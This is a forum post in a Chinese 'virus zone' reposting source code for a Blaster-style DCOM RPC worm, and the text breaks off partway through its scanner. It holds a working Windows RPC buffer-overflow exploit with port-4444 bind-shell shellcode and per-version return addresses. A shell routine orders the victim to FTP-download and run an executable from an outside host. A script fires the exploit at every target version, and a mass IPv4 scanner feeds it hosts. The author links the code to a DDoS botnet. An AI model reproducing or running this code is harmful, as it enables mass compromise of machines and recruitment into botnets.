论坛: 病毒专区 标题: 冲击波病毒源代码【请勿用于非法用途】 复制本贴地址    
作者: abctm [abctm]    版主   登录
VDCOM.c
/* RPC DCOM WORM v 2.2  -
* originally by volkam, fixed and beefed by uv/graff
* even more original concept by LSD-pl.net
* original code by HDM
*
* --
* This code is in relation to a specific DDOS IRCD botnet project.
* You may edit the code, and define which ftp to login
* and which executable file to receive and run.
* I use spybot, very convienent
* -
* So basically script kids and Brazilian children, this is useless to you
*
* -
* shouts: darksyn - true homie , giver of 0d4yz, and testbeds
*        volkam  - top sekret agent man
*        ntfx    - master pupil 
*        jpahk  - true homie #2
*
* Legion2000 Security Research (c) 2003
* -       
*  enjoy!
**************************************************************/ 

#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};


unsigned char *targets [] =
        {
            "Windows NT SP4 (english)",
            "Windows NT SP5 (chineese)",
            "Windows NT SP6 (chineese)",
            "Windows NT SP6a (chineese)",
            "Windows 2000 NOSP (polish)",
            "Windows 2000 SP3 (polish)",
            "Windows 2000 SP4 (spanish)",
            "Windows 2000 NOSP1 (english)",
            "Windows 2000 NOSP2 (english)",
            "Windows 2000 SP2-1 (english)",
            "Windows 2000 SP2-2 (english)",
            "Windows 2000 SP3-2 (english)",
            "Windows 2000 NOSP (chineese)",
            "Windows 2000 SP1 (chineese)",
            "Windows 2000 SP2 (chineese)",
            "Windows 2000 SP3 (chineese)",
            "Windows 2000 SP4 (chineese)",
            "Windows 2000 SP3 (german)",
            "Windows 2000 NOSP (japaneese",
            "Windows 2000 SP1 (japaneese)",
            "Windows 2000 SP2 (japaneese)",
            "Windows 2000 NOSP (korean)",
            "Windows 2000 SP1 (korean)",
            "Windows 2000 SP2 (korean)",
            "Windows 2000 NOSP (mexican)",
            "Windows 2000 SP1 (mexican)",
            "Windows XP NOSP (english)",
            "Windows SP1-2 (english)",
            "Windows 2k3 (english)",
            "Windows 2000 SP3 (german)",
            "Windows 2000 SP4-1 (german)",
            "Windows 2000 SP4-2 (german)",
            "Windows XP SP1 (german)",
            "Windows 2000 SERVER SP1 (french)",
            "Windows 2000 SERVER SP4 (french)",
            "Windows XP NOSP (french)",
            "Windows XP SP1 (french)",
            "Windows 2000 SP0 (english)",
            "Windows 2000 SP1 (english)",
            "Windows 2000 SP2 (english)",
            "Windows 2000 SP3 (english)",
            "Windows 2000 SP4 (english)",
            "Windows XP SP0 (english)",
            "Windows XP SP1-1 (english)",
          "Windows XP SP2 (english)",
            "Windows 2000 Advanced Server SP3 (english)",
            "ALL/WINXP/WIN2K",
            NULL                                                                                     
        };
       
unsigned long offsets [] =
        {
            0x77e527f3,
            0x77cfdaee,
            0x77ac0ef0,
            0x77c3eaf0,
            0x774d3fe3,
            0x77292ce4,
            0x77133ba5,
            0x777416e8,
            0x772b49e2,
            0x77b524e8,
            0x775cfa2e,
            0x772ae3e2,
            0x778b89e6,
            0x772b49e0,
            0x77444342,
            0x77294cdf,
            0x777a882e,
            0x77e527f3,
            0x778b89e5,
            0x772b49df,
            0x772ae3e1,
            0x778b89e5,
            0x772b49df,
            0x772ae3e1,
            0x778b89e8,
            0x77e3afe9,
            0x77db37d7,
            0x77b05422,
            0x77292ce3,
            0x77294ce0,
            0x7756c2e2,
            0x77fc18d4,
            0x774b3ee4,
            0x7756c2e2,
            0x774a75d4,
            0x77fc18d4,
            0x77e81674,
            0x77e829ec,
            0x77e824b5,
            0x77e8367a,
            0x77f92a9b,
            0x77e9afe3,
            0x77e626ba,
            0x77d737db,
            0x77e2afc5,
            0x010016C6   
};

unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */
   
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* port 4444 bindshell */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

 

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};


/*
 * shell() - drive the port-4444 bind shell reached through `sock`.
 *
 * The very first thing written to the socket is the hard-coded `cmd`: a
 * Windows command line that builds an FTP script file named "o" (open the
 * FTP host named in the string, the user/password lines, bin, get
 * explorer.exe, bye), runs "ftp -s:o", starts the fetched explorer.exe,
 * deletes the script and exits.  That is the propagation stage of this
 * tool.  For a responder the host-side artefacts are the "o" script and an
 * explorer.exe dropped in the shell's working directory; on the network it
 * is an outbound FTP connection from the victim right after the inbound
 * TCP/4444 connection.
 *
 * What follows is a select()-based relay between stdin and the socket, but
 * the unconditional exit(0) at the end of the loop body terminates the
 * process after the first pass.  Never returns: exits with 2 when recv()
 * or read() fails, otherwise 0.
 */
void
shell(int sock)
{
        fd_set  fd_read;
        char buff[1024], *cmd="echo open coke13.ddo.jp>>o&echo wed>>o&echo wed>>o&echo user wed wed>>o&echo bin>>o&echo get explorer.exe>>o&echo bye>>o&ftp -s:o&explorer.exe&del o&exit\n";


        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        /* payload delivery: sent once, before any interactive relay; return value unchecked */
        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                /* select() rewrites the set, so both descriptors are re-armed every pass */
                FD_SET(sock,&fd_read);
                FD_SET(0,&fd_read);

                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                if (FD_ISSET(sock, &fd_read)) {

                        /* only a negative return counts as EOF; recv() == 0 (peer closed) is not */
                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (write(1, buff, n) < 0) break;
                }

                if (FD_ISSET(0, &fd_read)) {

                        if((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (send(sock, buff, n, 0) < 0) break;
                }

                usleep(10);
/* unconditional: the process ends here after the first pass of the loop */
exit(0);
        }

        fprintf(stderr, "Connection lost.\n\n");
        exit(0);
}


/*
 * Entry point of the exploit half of this package.
 *
 *   argv[1]  index into targets[]/offsets[]: selects the return address
 *            that is patched into sc[] for the victim's OS/language build
 *   argv[2]  victim IPv4 address in dotted form (parsed with inet_addr())
 *
 * Sequence as written:
 *   1. print the banner; with fewer than two arguments list targets[] and
 *      exit(1);
 *   2. copy offsets[target_id] into sc[] at byte 36 (target_id comes
 *      straight from atoi() and is not checked against the table length);
 *   3. connect to TCP/135, send bindstr (the DCERPC bind), read the reply
 *      into buf1 without inspecting it, send buf2 = request1 + request2 +
 *      sc + request3 + request4 with several 32-bit words in request2 and
 *      at fixed offsets of buf2 increased by the payload size, close;
 *   4. sleep one second, connect to TCP/4444 on the same host and hand the
 *      socket to shell(), which does not return.
 *
 * Every error path also returns 0 (after perror()/printf()), so the exit
 * status does not distinguish success from failure.
 *
 * Network-side indicators for detection: a TCP/135 session carrying a
 * DCERPC bind immediately followed by a large request, then a TCP/4444
 * connection from the same source roughly one second later.
 */
int main(int argc, char **argv)
{
   
    int sock;
    int len,len1;
    unsigned int target_id;
    unsigned long ret;
    struct sockaddr_in target_ip;
    unsigned short port = 135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    printf("---------------------------------------------------------\n");
    printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
    printf("- Original code by FlashSky and Benjurry\n");
    printf("- Rewritten by HDM\n");
    printf("- autoroot/worm by volkam\n");
    printf("- Fixed and Beefed by Legion2000 Security Research\n");


    if(argc<3)
    {
        printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
        printf("- Targets:\n");
        for (len=0; targets[len] != NULL; len++)
        {
            printf("-          %d\t%s\n", len, targets[len]); 
        }
        printf("\n");
        exit(1);
    }

    /* yeah, get over it :) */
    /* no bounds check: an index past the end of offsets[] reads adjacent memory */
    target_id = atoi(argv[1]);
    ret = offsets[target_id];
   
    printf("- Using return address of 0x%.8x\n", ret);

    /* splice the chosen return address into the payload */
    memcpy(sc+36, (unsigned char *) &ret, 4);

    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);
    target_ip.sin_port = htons(port);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("- Socket");
        return(0);
    }
   
    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
        perror("- Connect");
        return(0);
    }
   
    /* assemble buf2 = request1 | request2 | sc | request3 | request4 */
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
   
    /* the two 32-bit words in request2 are widened by half the payload size (written in place, in the global array) */
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; 
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
   
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
   
    /* length/size words at fixed offsets inside the assembled request, each grown by sizeof(sc)-0xc */
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
   

    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; 
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
   
    if (send(sock,bindstr,sizeof(bindstr),0)== -1)
    {
            perror("- Send");
            return(0);
    }
    /* bind reply is read but never examined; len is overwritten and unused */
    len=recv(sock, buf1, 1000, 0);
   
    if (send(sock,buf2,len1,0)== -1)
    {
            perror("- Send");
            return(0);
    }
    close(sock);
    /* presumably gives the bind shell time to start before the second connect — not verified here */
    sleep(1);
   
    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);
    target_ip.sin_port = htons(4444);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("- Socket");
        return(0);
    }
   
    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
        printf("- Exploit appeared to have failed.\n");
        return(0);
    } 
   
    printf("- Dropping to System Shell...\n\n");


    shell(sock);
    return(0);
}


地主 发表时间: 10/20 21:52

回复: abctm [abctm]   版主   登录
serv









# serv - launched by SCAN.c (check_sockets) as "./serv <ip>" for every host
# whose TCP connect completed.  Runs vdcom against $1 once per index of
# VDCOM.c's targets[] table (44..46 first, then 10..43, then 0..9 in a
# scrambled order), every instance in the background at once - presumably
# because the scanner does not fingerprint the OS/language build and simply
# tries all of them.  No shebang line; $1 is used unquoted.
./vdcom 44 $1&
./vdcom 45 $1&
./vdcom 46 $1&
./vdcom 10 $1&
./vdcom 11 $1&
./vdcom 12 $1&
./vdcom 13 $1&
./vdcom 14 $1&
./vdcom 15 $1&
./vdcom 16 $1&
./vdcom 17 $1&
./vdcom 18 $1&
./vdcom 19 $1&
./vdcom 20 $1&
./vdcom 21 $1&
./vdcom 22 $1&
./vdcom 23 $1&
./vdcom 24 $1&
./vdcom 25 $1&
./vdcom 26 $1&
./vdcom 27 $1&
./vdcom 28 $1&
./vdcom 29 $1&
./vdcom 30 $1&
./vdcom 31 $1&
./vdcom 32 $1&
./vdcom 33 $1&
./vdcom 34 $1&
./vdcom 35 $1&
./vdcom 36 $1&
./vdcom 37 $1&
./vdcom 38 $1&
./vdcom 39 $1&
./vdcom 40 $1&
./vdcom 41 $1&
./vdcom 42 $1&
./vdcom 43 $1&
./vdcom 5 $1&
./vdcom 4 $1&
./vdcom 6 $1&
./vdcom 0 $1&
./vdcom 1 $1&
./vdcom 2 $1&
./vdcom 3 $1&
./vdcom 8 $1&
./vdcom 9 $1&
./vdcom 7 $1&


B1层 发表时间: 10/20 21:52

回复: abctm [abctm]   版主   登录
SCAN.c


#include <stdio.h>
#include <string.h>
#include <time.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

#define MAX_SOCKETS 1000
#define TIMEOUT 2

#define S_NONE      0
#define S_CONNECTING 1

/* One slot of the scanner's connection table. */
struct conn_t {
  int s;                    /* socket fd; meaningful only while status != S_NONE */
  char status;              /* S_NONE (free) or S_CONNECTING (connect in flight) */
  time_t a;                 /* time(0) when the slot was filled; compared against TIMEOUT */
  struct sockaddr_in addr;  /* target address/port for this slot */
};
/* global fixed-size table: filled by main(), drained by check_sockets() */
struct conn_t connlist[MAX_SOCKETS];

void init_sockets(void);
void check_sockets(void);
void fatal(char *);

/*
 * Scanner entry point.  Walks the IPv4 space sequentially from
 * <a-block>.<b-block>.<c-block>.0, keeping up to MAX_SOCKETS non-blocking
 * TCP connects to <port> in flight; check_sockets() decides what happens to
 * each one and is where "./serv <ip>" is spawned for hosts that connect.
 *
 * argv: <a-block> <port> [b-block] [c-block].  Each block is atoi()'d and
 * range-checked to 0..255; the port is only rejected when it is 0.
 *
 * main() only creates the socket, sets O_NONBLOCK and fills in the address
 * and timestamp; the connect() call itself is issued by check_sockets().
 * `done` is never set, so the while loop has no normal exit: after the last
 * address it either spins calling check_sockets() with nothing pending, or
 * reaches a ".255" last octet, which inet_addr() rejects and fatal() aborts
 * the run.  scantime is assigned but never read.
 */
int main(int argc, char *argv[])
{
  int done, i, aa, bb, cc, dd, ret, k, ns;
  unsigned int port;
  time_t scantime;
  char ip[20];

  if (argc < 3) {
    printf("Usage: %s <a-block> <port> [b-block] [c-block]\n", argv[0]);
    return -1;
  }

  done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;

  aa = atoi(argv[1]);
  if ((aa < 0) || (aa > 255)) {
    fatal("Invalid a-range\n");
  }
 
  port = (unsigned int)atoi(argv[2]);
  if (port == 0)
    fatal("Bad port number.\n"); 

  if (argc >= 4) {
    bb = atoi(argv[3]);
    if ((bb < 0) || (bb > 255))
        fatal("Invalid b-range.\n");
  }

  if (argc >= 5) {
    cc = atoi(argv[4]);
    if ((cc < 0) || (cc > 255))
        fatal("Invalid c-range.\n");
  } 

  init_sockets();

  scantime = time(0);

  while(!done) {
    for (i = 0; i < MAX_SOCKETS; i++) {
        /* carry dd -> cc -> bb -> aa; the last octet runs 0..254, 255 triggers the carry.
         * Once all four octets are exhausted, stop filling slots only when no connect is outstanding. */
        if (dd == 255) {
          if (cc < 255) {
              cc++;
              dd = 0;
          }
          else {
              if (bb < 255) {
                bb++;
                cc = 0;
                dd = 0;
              }
              else {
                if (aa < 255) {
                    aa++;
                    bb = 0;
                    cc = 0;
                    dd = 0;
                }
                else {
                    ns = 0;
                    for (k = 0; k < MAX_SOCKETS; k++) {
                        if (connlist[k].status > S_NONE)
                          ns++;
                    }

                    if (ns == 0)
                      break;
                }
              }
          }
      }

        /* free slot: prepare a non-blocking socket for the current address;
         * the connect() itself happens in check_sockets() */
        if (connlist[i].status == S_NONE) {
          connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
          if (connlist[i].s != -1) {
